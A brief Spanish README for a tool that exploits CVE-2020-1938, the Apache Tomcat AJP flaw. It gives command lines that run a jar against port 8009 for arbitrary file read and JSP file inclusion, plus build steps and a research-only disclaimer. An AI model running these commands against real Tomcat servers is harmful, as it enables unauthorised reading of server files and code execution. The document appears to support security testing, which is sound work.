
CVE-2020-1938
La herramienta se utiliza únicamente para investigación de seguridad y autocomprobación interna. Está prohibido usarla para lanzar ataques ilegales; el usuario asume las consecuencias.

apache-tomcat-8.5.32.zip para probar tomcat
Lectura arbitraria de archivos
java -jar 1.jar com.threedr3am.bug.tomcat.ajp.FileRead 127.0.0.1 8009 file /index.jsp
Inclusión de archivos
java -jar 1.jar com.threedr3am.bug.tomcat.ajp.FileRead 127.0.0.1 8009 jsp /index.jsp
Método de empaquetado: En el directorio tomcat/ajp-bug Ejecute mvn clean compile assembly:assembly